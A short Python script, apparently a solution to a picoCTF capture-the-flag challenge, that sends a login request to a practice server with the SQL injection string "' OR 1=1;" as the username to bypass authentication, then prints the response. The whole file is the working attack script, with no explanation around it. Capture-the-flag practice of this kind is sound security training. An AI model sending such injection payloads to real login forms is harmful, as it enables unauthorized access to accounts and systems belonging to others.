#!/usr/bin/env nix-shell
#!nix-shell -p python3 -i python3 python3Packages.requests

import requests
# from bs4 import BeautifulSoup

BASE_URL = "http://saturn.picoctf.net:52814/"

def main():
    s = requests.Session()

    res = s.post(
        BASE_URL + "login.php",
        data = {
            'username': "' OR 1=1;",
            'password': 'asdf',
            'submit': 'Login',
        },
    )

    print(res)
    print(res.text)

if __name__ == "__main__":
    main()
